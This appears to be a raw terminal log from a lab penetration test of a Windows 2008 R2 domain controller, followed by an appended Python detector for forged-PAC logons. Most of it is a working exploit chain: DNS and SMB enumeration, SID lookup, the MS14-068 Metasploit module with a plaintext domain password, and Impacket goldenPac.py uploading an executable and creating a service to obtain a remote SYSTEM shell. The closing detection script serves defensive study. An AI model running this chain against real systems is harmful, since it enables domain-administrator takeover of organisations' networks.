jvh@jvh-E403SA:~$ cat Desktop/testingformerica
C:\Users\Admin\Desktop\Confidential data>type dns.contoso-west.org
type dns.contoso-west.org
> ls -d contoso-west.org

...
[dc2008r2-group1.contoso-west.org]
dc2008r2-group1 A 10.0.0.149
dcslave2008-group1 A 10.0.0.148
DomainDnsZones A 10.0.0.149
...


msf auxiliary(smb_version) > set RHOSTS 10.0.0.149
RHOSTS => 10.0.0.149
msf auxiliary(smb_version) > run

[+] 10.0.0.149:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:DC2008R2-GROUP1) (domain:CONTOSO-WEST)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


proxychains net rpc -W contoso-west.org -U blot -S 10.0.0.149 shell
ProxyChains-3.1 (http://proxychains.sf.net)
Enter blot's password: Bl0tt12309-
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
Talking to domain CONTOSO-WEST (S-1-5-21-3039018489-1111549232-2925702125)
net rpc> user
net rpc user> show
Usage: net rpc user show <username>
net rpc user show failed: NT_STATUS_INVALID_PARAMETER
net rpc user> show blot
user rid: 1109, group rid: 513
net rpc user> packet_write_wait: Connection to 2001:700:300:7::85 port 22: Broken pipe


auxiliary/admin/kerberos/ms14_068_kerberos_checksum


msf auxiliary(ms14_068_kerberos_checksum) > show info

Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2014-11-18

Provided by:
Tom Maddock
Sylvain Monne
juan vazquez <juan.vazquez@metasploit.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD                   yes       The Domain User password
RHOST                      yes       The target address
RPORT     88               yes       The target port
Timeout   10               yes       The TCP timeout to establish connection and read data
USER                       yes       The Domain User
USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

Description:
This module exploits a vulnerability in the Microsoft Kerberos
implementation. The problem exists in the verification of the
Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
where a domain user may forge a PAC with arbitrary privileges,
including Domain Administrator. This module requests a TGT ticket
with a forged PAC and exports it to a MIT Kerberos Credential Cache
file. It can be loaded on Windows systems with the Mimikatz help. It
has been tested successfully on Windows 2008.

References:
https://cvedetails.com/cve/CVE-2014-6324/
https://technet.microsoft.com/en-us/library/security/MS14-068
OSVDB (114751)
http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
https://github.com/bidord/pykek
https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit



msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
DOMAIN => CONTOSO-WEST
msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
RHOST => 10.0.0.149
msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
USER => blot
msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
msf auxiliary(ms14_068_kerberos_checksum) > show options

Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

Name      Current Setting                                  Required  Description
----      ---------------                                  --------  -----------
DOMAIN    contoso-west.org                                 yes       The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD  Bl0tt12309-                                      yes       The Domain User password
RHOST     10.0.0.149                                       yes       The target address
RPORT     88                                               yes       The target port
Timeout   10                                               yes       The TCP timeout to establish connection and read data
USER      blot                                             yes       The Domain User
USER_SID  S-1-5-21-3039018489-1111549232-2925702125-1109   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000


msf auxiliary(ms14_068_kerberos_checksum) > run

[*] Validating options...
[*] Using domain CONTOSO-WEST.ORG...
[*] 10.0.0.149:88 - Sending AS-REQ...
[*] 10.0.0.149:88 - Parsing AS-REP...
[*] 10.0.0.149:88 - Sending TGS-REQ...
[+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
[+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
[*] Auxiliary module execution completed

root@10-kali2-group10:~/.msf4/loot# ls
20181010173151_default_192.168.40.14_192.168.40.14_ce_775643.crt
20181010173151_default_192.168.40.14_192.168.40.14_ke_958653.key
20181010173151_default_192.168.40.14_192.168.40.14_pe_462147.pem
20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
root@10-kali2-group10:~/.msf4/loot#


To use this ticket, which is in the Credential Cache (ccache) format, we need to move it to the /tmp directory where the Kerberos tools look for tickets.

root@10-kali2-group10:~/.msf4/loot# mv 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin /tmp/krb5cc




Modified /etc/krb5.conf with nano and added:
[realms]
    CONTOSO-WEST.ORG = {
        kdc = dc2008r2-group1
        admin_server = dc2008r2-group1
        default_domain = CONTOSO-WEST
    }
[domain_realm]
    # realm names are case-sensitive: map the full DNS domain to the realm defined above
    .contoso-west.org = CONTOSO-WEST.ORG
    contoso-west.org = CONTOSO-WEST.ORG


proxychains python2.7 examples/goldenPac.py -dc-ip 10.0.0.149 -target-ip 10.0.0.149 CONTOSO-WEST.org/Blot@dc2008r2-group1.CONTOSO-WEST.org
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation

Password:Bl0tt12309-
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
[*] User SID: S-1-5-21-3039018489-1111549232-2925702125-1109
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
|DNS-request| contoso-west.org
|S-chain|-<>-127.0.0.1:1099-<><>-4.2.2.2:53-<><>-OK
|DNS-response|: contoso-west.org does not exist
[-] Couldn't get forest info ([Errno Connection error (contoso-west.org:445)] [Errno 1] Unknown error), continuing
[*] Attacking domain controller 10.0.0.149
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
[*] 10.0.0.149 found vulnerable!
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
[*] Requesting shares on 10.0.0.149.....
[*] Found writable share ADMIN$
[*] Uploading file UApVHfro.exe
[*] Opening SVCManager on 10.0.0.149.....
[*] Creating service TGOJ on 10.0.0.149.....
[*] Starting service TGOJ.....
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
[!] Press help for extra shell commands
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.0.0.149
Subnet Mask . . . . . . . . . . . : 255.255.255.240
Default Gateway . . . . . . . . . : 10.0.0.145

Tunnel adapter isatap.{E58D4114-3C3A-46FD-AEAD-ECA142ED8636}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :

C:\Windows\system32>
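A defender-side counterpart to the session above, added here and not part of the paste or of any of the referenced tools: a small checker that runs over domain-controller 4624 logon events and flags any whose Security ID does not resolve to the event's Account Name, the indicator Microsoft's CVE-2014-6324 write-up referenced above points at for forged-PAC logons. The domain SID and blot's RID 1109 are taken from the session; the event lines, their flattened key=value layout, and the DIRECTORY mapping are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Domain SID and blot's RID (1109) are taken from the session above; the
# Administrator entry is the well-known RID 500 and is not from the paste.
DOMAIN_SID = "S-1-5-21-3039018489-1111549232-2925702125"
DIRECTORY: Dict[str, int] = {"blot": 1109, "Administrator": 500}

# Constructed 4624/4672 events flattened to key=value fields; this is a
# simplified layout for the example, not real DC Security-log output.
SAMPLE_EVENTS = [
    f"EventID=4624 SecurityID={DOMAIN_SID}-1109 AccountName=blot LogonType=3",
    f"EventID=4624 SecurityID={DOMAIN_SID}-500 AccountName=blot LogonType=3",
    f"EventID=4624 SecurityID={DOMAIN_SID}-500 AccountName=Administrator LogonType=3",
    f"EventID=4624 SecurityID={DOMAIN_SID}-1109 AccountName=Administrator LogonType=3",
    f"EventID=4672 SecurityID={DOMAIN_SID}-500 AccountName=Administrator",
]
FIELD = re.compile(r"(\w+)=(\S+)")

def parse_event(line: str) -> Dict[str, str]:
    """Split one flattened event line into its key/value fields."""
    return dict(FIELD.findall(line))

def rid_of(sid: str, domain_sid: str) -> Optional[int]:
    """Return the RID when sid belongs to domain_sid, otherwise None."""
    prefix = domain_sid + "-"
    rest = sid[len(prefix):]
    if not sid.startswith(prefix) or not rest.isdigit():
        return None
    return int(rest)

def check_event(event: Dict[str, str], directory: Dict[str, int], domain_sid: str) -> Optional[str]:
    """Return a finding when a 4624 event's SID does not resolve to its Account Name."""
    if event.get("EventID") != "4624":
        return None  # only logon events carry the SID/name pair being compared
    name, sid = event.get("AccountName", ""), event.get("SecurityID", "")
    rid = rid_of(sid, domain_sid)
    if rid is None:
        return f"foreign or malformed SID {sid!r} in logon for {name!r}"
    expected = directory.get(name)
    if expected is None:
        return f"unknown account {name!r} logged on with RID {rid}"
    if expected != rid:
        return f"SID/name mismatch: account {name!r} is RID {expected} but event carries RID {rid}"
    return None

def scan(lines: List[str], directory=DIRECTORY, domain_sid=DOMAIN_SID) -> List[str]:
    """Run check_event over every line and keep only the findings."""
    return [f for f in (check_event(parse_event(l), directory, domain_sid) for l in lines) if f]
```

A forged PAC that keeps the user's own SID and only adds privileged group SIDs will not trip this check, so it complements rather than replaces patching the KDC.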